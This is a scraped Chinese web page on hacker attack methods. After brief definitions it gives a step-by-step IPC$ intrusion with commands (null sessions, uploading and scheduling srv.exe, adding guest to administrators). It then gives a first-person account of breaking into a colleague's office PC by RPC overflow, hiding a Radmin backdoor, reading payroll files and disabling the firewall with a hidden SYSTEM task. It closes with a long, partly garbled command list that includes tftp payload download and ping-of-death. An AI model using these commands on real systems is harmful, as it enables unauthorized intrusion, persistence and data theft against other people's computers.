黑客 *** 攻击代码_黑客 *** 攻击指令是什么

什么是 *** 黑客？黑客常用的攻击 *** 有哪些？

相关推荐：《编程学习网站》

什么是 *** 黑客？

*** 黑客是指拥有高超的编程技术，强烈的解决问题和克服限制的欲望、擅长IT技术的人群、计算机科学家，以及对计算机科学、编程和设计方面具高度理解的人。

黑客，最早源自英文hacker，早期在美国的电脑界是带有褒义的。都是水平高超的电脑专家，尤其是程序设计人员，算是一个统称。

红客，维护国家利益代表祖国人民意志的红客，热爱自己的祖国，民族，和平，极力的维护国家安全与尊严。

蓝客，信仰自由，提倡爱国主义的黑客们，用自己的力量来维护 *** 的和平。

骇客，是“Cracker”的音译，就是“破解者”的意思。从事恶意破解商业软件、恶意入侵别人的网站等事务。与黑客近义，其实黑客与骇客本质上都是相同的，闯入计算机系统/软件者。黑客和“骇客”（Cracker）并没有一个十分明显的界限，但随着两者含义越来越模糊，公众对待两者含义已经显得不那么重要了。

黑客常用的攻击 ***

黑客攻击手段可分为非破坏性攻击和破坏性攻击两类。非破坏性攻击一般是为了扰乱系统的运行，并不盗窃系统资料，通常采用拒绝服务攻击或信息炸弹；破坏性攻击是以侵入他人电脑系统、盗窃系统保密信息、破坏目标系统的数据为目的。

1、种植病毒

病毒程序具有潜伏性，会对个人信息安全造成长期影响。以前，病毒主要常见于电脑，现在随着手机普及，移动设备上的病毒也很多。

病毒并不会主动攻击个人设备，往往是潜藏在网页、软件中，用户进行点击、安装等操作后被植入，只要设备联网，病毒程序就会自动将搜集来的信息上报给黑客。

病毒也在更新换代，很多高级病毒是普通软件难以查杀的，甚至还有病毒就藏在正规杀毒软件里，令你防不胜防。

2、电子邮件攻击

电子邮件攻击主要表现为两种方式：一是电子邮件轰炸和电子邮件“滚雪球”，也就是通常所说的邮件炸弹，指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件，致使受害人邮箱被“炸”，严重者可能会给电子邮件服务器操作系统带来危险，甚至瘫痪；二是电子邮件欺骗，攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序（据笔者所知，某些单位的 *** 管理员有定期给用户免费发送防火墙升级程序的义务，这为黑客成功地利用该 *** 提供了可乘之机)，这类欺骗只要用户提高警惕，一般危害性不是太大。

3、 *** 监听

*** 监听是主机的一种工作模式，在这种模式下，主机可以接受到本网段在同一条物理通道上传输的所有信息，而不管这些信息的发送方和接受方是谁。此时，如果两台主机进行通信的信息没有加密，只要使用某些 *** 监听工具，例如NetXray for windows 95/98/nt，sniffit for linux 、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然 *** 监听获得的用户帐号和口令具有一定的局限性，但监听者往往能够获得其所在网段的所有用户帐号及口令。

4、系统漏洞

许多系统都有这样那样的安全漏洞（Bugs），其中某些是操作系统或应用软件本身具有的，如Sendmail漏洞，win98中的共享目录密码验证漏洞和IE5漏洞等，这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏，除非你将网线拔掉；还有一些漏洞是由于系统管理员配置错误引起的，如在 *** 文件系统中，将目录和文件以可写的方式调出，将未加Shadow的用户密码文件以明码方式存放在某一目录下，这都会给黑客带来可乘之机，应及时加以修正。

5、后门程序

由于程序员设计一些功能复杂的程序时，一般采用模块化的程序设计思想，将整个项目分割为多个功能模块，分别进行设计、调试，这时的后门就是一个模块的秘密入口。在程序开发阶段，后门便于测试、更改和增强模块功能。正常情况下，完成设计之后需要去掉各个模块的后门，不过有时由于疏忽或者其他原因（如将其留在程序中，便于日后访问、测试或维护）后门没有去掉，一些别有用心的人会利用穷举搜索法发现并利用这些后门，然后进入系统并发动攻击。

6、信息炸弹

信息炸弹是指使用一些特殊工具软件，短时间内向目标服务器发送大量超出系统负荷的信息，造成目标服务器超负荷、 *** 堵塞、系统崩溃的攻击手段。比如向未打补丁的 Windows 95系统发送特定组合的 UDP 数据包，会导致目标系统死机或重启；向某型号的路由器发送特定数据包致使路由器死机；向某人的电子邮件发送大量的垃圾邮件将此邮箱“撑爆”等。目前常见的信息炸弹有邮件炸弹、逻辑炸弹等。

7、拒绝服务

又叫分布式D.O.S攻击，它是使用超出被攻击目标处理能力的大量数据包消耗系统可用系统、带宽资源，最后致使 *** 服务瘫痪的一种攻击手段。作为攻击者，首先需要通过常规的黑客手段侵入并控制某个网站，然后在服务器上安装并启动一个可由攻击者发出的特殊指令来控制进程，攻击者把攻击对象的IP地址作为指令下达给进程的时候，这些进程就开始对目标主机发起攻击。这种方式可以集中大量的 *** 服务器带宽，对某个特定目标实施攻击，因而威力巨大，顷刻之间就可以使被攻击目标带宽资源耗尽，导致服务器瘫痪。比如1999年美国明尼苏达大学遭到的黑客攻击就属于这种方式。

跪求cmd黑客攻击指令和cmd电脑命令！悬赏大大滴有

一 相关命令

建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

删除一个ipc$连接

net use \\IP\ipc$ /del

删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use * /del 删除全部,会有提示要求按y确认

提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射 *** 驱动器,效果一样.

二 经典入侵模式

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以之一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\net time \\127.0.0.1

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5. C:\net time \\127.0.0.1

再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32ntlm

输入ntlm启动（这里的C:\WINNT\system32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机).

ipc$经典入侵步骤：

1、net use \\ip\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功，连接你的肉鸡

常用的 *** 命令

net user 查看用户列表

net user 用户名 密码 /add 添加用户

net user 用户名 密码 更改用户密码

net localgroup administrators 用户名 /add 添加用户到管理组

net user 用户名 /delete 删除用户

net user 用户名 查看用户的基本情况

net user 用户名 /active:no 禁用该用户

net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源

net share 共享名 查看该共享的情况

net share 共享名=路径 设置共享。例如 net share c$=c:

net share 共享名 /delete 删除IPC$共享

net stop lanmanserver 关闭ipc$和默认共享依赖的服务

net use 查看IPC$连接情况

net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

net use \\ip\ipc$ /del 删除一个连接

net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

net use z: /del

net time \\ip 查看远程计算机上的时间

copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

at 查看自己计算机上的计划作业

at \\ip 查看远程计算机上的计划作业

at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

at \\ip all /delete 删除远程计算机上的全部计划作业

at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt；

下面纯手打，上面是度娘给的

taskkill /im 进程名 停止运行

tasklisy 查看运行进程

ipconfig 查看本机IP

md 创建文件夹

rd 删除文件夹

echo off .txt|exit 添加文本

echo 内容 .txt 给文本添加内容

copy 复制文件

net user 用户名 密码/add 创建一个普通账号

net localgroup administrators 用户名 /add 把账户加入超级用户组

局域网入侵命令有哪些？

先打开命令提示符，用ping命令去ping它，Replyfrom192.168.16.4:bytes=32time1msTTL=128，说明对方没有防火墙，这样或许有可能入侵。

下一步，我使用了X-SCAN3.2对它进行了详细扫描,对方电脑的操作系统是XP，大家知道XP系统是相当安全的，在一些黑客论坛讨论的关于入侵XP的话题也是比较多的，入侵这样的系统 *** 只有两种，一是采用钓鱼的 *** ，这是一种被动的方式让对方中木马来控制它。

第二种 *** 就是如果对方有比较严重的漏洞，如RPC溢出

先打开命令提示符，用ping命令去ping它，Replyfrom192.168.16.4:bytes=32time1msTTL=128，说明对方没有防火墙，这样或许有可能入侵。下一步，我使用了X-SCAN3.2对它进行了详细扫描,对方电脑的操作系统是XP，大家知道XP系统是相当安全的，在一些黑客论坛讨论的关于入侵XP的话题也是比较多的，入侵这样的系统 *** 只有两种，一是采用钓鱼的 *** ，这是一种被动的方式让对方中木马来控制它。第二种 *** 就是如果对方有比较严重的漏洞，如RPC溢出。这样的话，用溢出程序溢出它，然后再上传控制程序进行控制。扫描结果确实让我高兴了一阵,对方电脑有大量的漏洞,其中一个比较有名的就是冲击波利用的RPC漏洞,这个漏洞相当出名了,03年的时候曾席卷全球。知道了它有这个漏洞，下一步就要找溢出程序，这让我忙活了好一阵时间，因为有的溢出程序对这台电脑好像无效。这些工具的名称我都记不起来了，反正有好几个。最后找到了一个溢出程序XP.EXE，这个程序终于溢出了那台电脑。得到了个CMDSHELL。这算是一个小小的胜利吧。

得到了CMDSHELL，我该怎样给它上传控制程序呢？我想了一会儿，终于灵感来了，我和它在一个局域网，用共享上传最方便了。于是打开网上邻居，查看工作组计算机，找到这台电脑，双击，进不去，提示信息我记不清了，据我分析可能是对方这台电脑没有运行 *** 安装向导，因为是XP系统，所以要用共享传输文件，必须要运行这个向导不可，运行这个向导作用就是配置一个本地安全策略，你可以打开“控制面板—管理工具—本地安全策略”，展开“本地策略”—“用户权利指派”。在右边有一个安全策略—“拒绝从 *** 访问这台计算机”。我想对方的电脑中相应的这条策略里，肯定设置有GUEST这个用户的，这就是为什么我打不开它的共享的原因，因为共享访问默认是以这个GEUST用户登录的，因为它的安全设置不允许GUEST从 *** 访问，所以我才访问不了它的共享。因为XP默认的共享模式是简单文件共享。这与WIN2000系统不同，如果是WIN2000系统，你在知道管理员密码的情况下，可以用命令netuseIPipc$"密码"/user:用户名建立与对方的ipc$连接，随之而来的就是copy木马程序ipd$这样的命令上传木马了。XP就不能这样子了，你即使知道它的管理员密码用上面的命令与不能建立ipc$连接。这就是为什么XP比2000系统安全的地方所在。下面我要作的就是要修改XP的共享模式为2000的共享模式。 *** 如下：在溢出获得的CMDSHELL下，键入命令：

echoWindowsRegistryEditorVersion5.00c:123.reg

echo[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]c:123.reg

echo.c:123.reg

echo"forceguest"=dword:00000000c:123.reg

regedit/ec:123.reg

等打完这几条命令后，对方XP的共享模式就已经与2000的相同了。我来解释一下这几条命令的含意，echoWindowsRegistryEditorVersion5.00c:123.reg这条命令是将WindowsRegistryEditorVersion5.00这几个字符保存到c:123.reg文件里。大家需要注意一下之一句的和后面几句的这是有区别的，字符是覆盖式的，是追加式的，第三句的echo.c:123.reg命令是追加一个空白行，这句挺重要，如果不加这句是不能成功的，你可以随便打开一个注册表文件看一下，格式就是这样的，第二行是空着的。这一点一定要注意。执行完前四条命令后就在对方C盘下生成一个123.reg文件，内容如下：

WindowsRegistryEditorVersion5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]

"forceguest"=dword:00000000

第五条命令是将这个REG文件导入到注册表中。这样执行完这五条命令后，我就可以像操作2000系统一样去用ipc$控制了。下一步，上传控制程序。我选择的是RADMIN2.0的服务程序，有人问这个安装需要到图形界面下，我说不用这么费事，在CMDSHELL下一样可以安装。安装前我们需要先准备一下，首先生成一个REG文件，文件名：aaa.reg内容如下：

WindowsRegistryEditorVersion5.00

[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]

"DisableTrayIcon"=hex:01,00,00,00

作用就是使生成的服务端程序能够隐藏通知栏里的图标，我们都知道正常安装RADMIN服务端程序后，在通知栏里是有一个小图标的，我们要入侵人家，当然要把这个小图标去掉，不然是会被发现的。接着生成一个BAT文件，我命名为aaa.bat，内容如下：

r_server/install/silence

r_server.exe/port:2233/pass:1/save/silence

regedit.exe/saaa.reg

netstartr_server

这些命令是安装命令，设置连接端口为：2233密码是：1隐藏安装界面的方式安装然后就是将aaa.reg导入注册表，启动r_server服务。

准备工作作好后，就要上传文件了，一共需上传4个文件，aaa.regaaa.batr_server.exeadmdll.dll后两个文件是RADMIN安装目录下的，在安装了RADMIN2.0客户端后，安装目录里就有这两个文件。我先建立ipc$连接netuse192.168.16.4ipc$""/user:administrator提示：命令成功完成。接着:

copyr_server192.168.1.4admin$system32

copyaaa.bat192.168.1.4admin$system32

copyaaa.reg192.168.1.4admin$system32

copyadmdll.dll192.168.1.4admin$system32

然后再进入溢出得到的CMDSHELL下键入：

attrib+s+h+rc:windowssystem32r_server.exe

attrib+s+h+rc:windowssystem32admdll.exe

attrib+s+h+rc:windowssystem32aaa.bat

attrib+s+h+rc:windowssystem32aaa.reg

这些命令是将这4个文件设置成系统隐藏只读文件，不容易被对方管理员发现。

下一步就是运行aaa.bat了，就这么简单，运行成功后，我用radmin2.0客户端设置了一下连接参数，端口改成2233，连接成功，密码是1，成功地看到了对方的屏幕。呵呵，成功了，从有入侵的想法到入侵成功进行控制，只用了短短的4天时间。

进入后看到对方电脑上正在玩 *** 保皇游戏，不过我也犯了个错误我给它新建了个管理用户，原先是打算用于ipc$连接用的，可我上传RADMIN控制后忘记删掉了，我在溢出的CMDSHELL下不小心键入了命令EXIT，结果对方电脑出现了倒计时关机的界面，我也没有及时处理掉，我当时要是用RADMIN的CMD功能，键入命令shutdown-A就可以取消这个倒计时关机的界面，可当时我也没有及时处理，导致对方电脑重启了，重启后我估计对方管理员看到了我新建的用户了，后来我用RADMIN远程查看时，也觉得这个新建用户太招摇了，用户名就是ip$,图标是个大红的花朵。

下午的时候我发现那台电脑的管理员请了位高手来助阵了，因为我们这个局域网中的各台电脑都通过我们办公室里的那台电脑连接到互联网上，所以，那位高手先到我们办公室电脑上查看了一番没有发现问题后，他将原先安装的江民换成了卡巴了，我估计他认为攻击是来自互联网上，岂不知黑客就在他眼皮底下，嘿嘿。。。。那位高手又给被我控制了的电脑上安装了卡巴，原先的杀毒软件是诺顿，对WINDOWS也进行了更新，可这些作法都晚了，因为我已经控制你了,再打补丁也无用了。经过那位高手一番检查与修补后，我的后门依然存在着，看来那位高手水平也不怎么样。我给它开放的ipc$功能，他也没发现。也许他只认为是一次简单的病毒攻击，而掉以轻心了，而不知他的一举一动都在我的监视之下。哈哈。。。

接下来的工作对我来说就比较简单了，给它开telnet服务器，开“远程桌面”这个我采用的是图形的方式进行操作的，中午下班后我等这台计算机管理员走后，用RADMIN登录进去进行了一些设置工作。后来也通过RADMIN的文件管理功能翻看了这台电脑上的文件，有一些财务报表，工资表之类的东西，这些对我来看没什么大的吸引力。不过我看到了我们集团老总的工资，每月一万多块钱呢！！好黑啊。。。这么多，我工资只有区区几百块，真是太不公平了，愤愤不平中。。。。

后来一次通过RADMIN操作对方的电脑时不小心被管理员发现了，我想对方的管理员也很感到意外，windows的补丁打上了，还装了强悍的卡巴，还是搞不定黑客！！哈哈，因为卡巴不是杀RADMIN的。后来对方那个管理员启用了局域网“本地连接”中的防火墙功能，这样我无法连接它的电脑了。因为RADMIN是正向连接的，所以在对方开防火墙的情况下是无法使用的。有一次下午下班后我无意地ping了一下这台电脑的IP，居然有返回。说明对方防火墙关闭了，我马上用RADMIN连接，居然成功。我晕。。。原来对方只开了防火墙，并没有发现这个明显的后门。我想开防火墙也是那位电脑高手给搞的，依那个管理员的水平是想不到这个办法的。不过telnet服务器给关闭了，3389远程桌面也给关了，共享模式也被修改回了原先的样子。看来那位高手也是发现了一些漏洞并补上了，但是那个后门，他却没有发现，这就给我创造了第二次入侵的机会。他有政策我有对策，他可以开防火墙，我可以给他关掉，有人问要是再被管理员开启了防火墙，那岂不是没得玩了。哈哈。。。我下面给出一个我自己研究出来的独门密方，保证百病！哈哈。。。。

我的 *** 是创建一个隐藏的计划任务。让这个计划任务每隔半个小时杀除一遍防火墙，这样即使对方管理员打开防火墙也起不了什么作用。 *** 如下：先建一个批处理文件abc.bat，放在c:windowssystem32目录下,内容如下：

netstopsharedaccess

当然也可以附加点别的，比如说你想半小时杀除一遍天网防火墙，可以再加上下面的命令：

taskkill/IMrfw.exe/f

如果想使共享模式是高级共享模式，可以再加上下面的命令：

regedit/ec:windowssystem32abc.reg

当然这需要事先上传一个abc.reg到它的c:windowssystem32目录下，内容如下：

WindowsRegistryEditorVersion5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]

"forceguest"=dword:00000000

下面我说一下创建隐藏计划任务的 *** ：

在对方电脑的CMDSHELL下键入命令：

schtasks/create/tn"常驻"/trc:windowssystem32abc.bat/scminute/mo30/ru"system"

这样就在对方电脑上建立了一个以SYSTEM权限运行的计划任务，这个计划任务每隔30分钟运行一次c:windowssystem32abc.bat,功能嘛，就是根据abc.bat里面的命令行决定了，可以说这个新发现是相当厉害的，利用的巧妙，功能可以相当强大。如果只有这样还不能达到隐藏的要求，你打开控制面板—任务计划，仍然可以发现它的存在。好的，下面说说隐藏它的 *** 。还是进入CMDSHELL中。键入命令attrib+hc:windowstasks常驻.job回车后，你再到控制面板的任务计划中看一下是不是以前的任务消失了。这只是表面消失，实际是它还是存在的。你可以在CMDSHELL下键入命令：schtasks查看。这样不管对方管理员怎样修改设置，每隔半小时就又会补修改回来。它想摆脱我的控制可说是难上加难了。

黑客常有的dos命令

黑客常用DOS命令:

net use $"\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空链接

net use $"\\ip\ipc$Content$nbsp;"密码" /user:"用户名" 建立IPC非空链接

net use h: $"\\ip\c$Content$nbsp;"密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: $"\\ip\c$Content$nbsp;登陆后映射对方C：到本地为H:

net use $"\\ip\ipc$Content$nbsp;/del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务；(如:net start telnet， net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统 *** 设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的 *** 连接类型和信息

net share 查看本地开启的共享

net share ipc$Content$nbsp;开启ipc$共享

net share ipc$Content$nbsp;/del 删除ipc$共享

net share c$Content$nbsp;/del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的 *** 连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）

move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，" "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe $"\\ip\admin$Content$nbsp;复制本地c:\srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

copy $\svv.exe"\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送

tftp -i 对方IP put c:\server.exe 登陆后，上传本地c:\server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示 *** 地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并更大化（最小化）运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序，并显示出：请按任意键继续....

if 在批处理程序中执行条件处理（更多说明见if命令及变量）

goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）

call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）

for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）

echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

print 文件名 打印文本文件

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS

md 目录名 创建目录

replace 源文件 要替换文件的目录 替换文件

ren 原文件名 新文件名 重命名文件名

tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称

type 文件名 显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令＝字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：

doskey dir= taskmgr 调出任务管理器 chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe path 路径\可执行文件的文件名为可执行文件设置一个路径。 cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； regedit /e 注册表文件名 导出注册表 cacls 文件名 参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 cacls 文件名 查看文件的访问用户权限列表 REM 文本内容 在批处理文件中添加注解 netsh 查看或更改本地 *** 配置情况 IIS服务命令： iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） iisreset /start或stop 启动（停止）所有Internet服务 iisreset /restart 停止然后重新启动所有Internet服务 iisreset /status 显示所有Internet服务状态 iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 FTP 命令： (后面有详细说明内容) ftp的命令行格式为: ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。 －d 使用调试方式。 －n 限制ftp的自动登录,即不使用.netrc文件。 －g 取消全局文件名。 help [命令] 或 ？[命令] 查看命令说明 bye 或 quit 终止主机FTP进程,并退出FTP管理方式. pwd 列出当前远端主机目录 put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 mget [remote-files] 从远端主机接收一批文件至本地主机 mput local-files 将本地主机中一批文件传送至远端主机 dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 ascii 设定以ASCII方式传送文件(缺省值) bin 或 image 设定以二进制方式传送文件 bell 每完成一次文件传送,报警提示 cdup 返回上一级目录 close 中断与远程服务器的ftp会话(与open对应) open host[port] 建立指定ftp服务器连接,可指定连接端口 delete 删除远端主机中的文件 mdelete [remote-files] 删除一批文件

黑客对 *** 的攻击手段

1、后门程序

